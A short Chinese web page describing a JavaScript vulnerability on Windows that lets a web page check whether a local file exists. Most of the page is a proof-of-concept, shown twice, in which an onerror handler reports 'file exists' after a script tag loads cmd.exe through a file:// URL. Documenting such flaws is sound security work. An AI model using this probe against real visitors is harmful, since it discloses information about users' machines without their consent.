JavaScript Windows 系统越权判断本地文件漏洞
漏洞证明:
1 <script> window.onerror=function(){ alert('文件存在'); return true; } </script> <script src="file://c:/windows/system32/cmd.exe"></script>
漏洞证明:
1 <script> window.onerror=function(){ alert('文件存在'); return true; } </script> <script src="file://c:/windows/system32/cmd.exe"></script>
浙公网安备 33010602011771号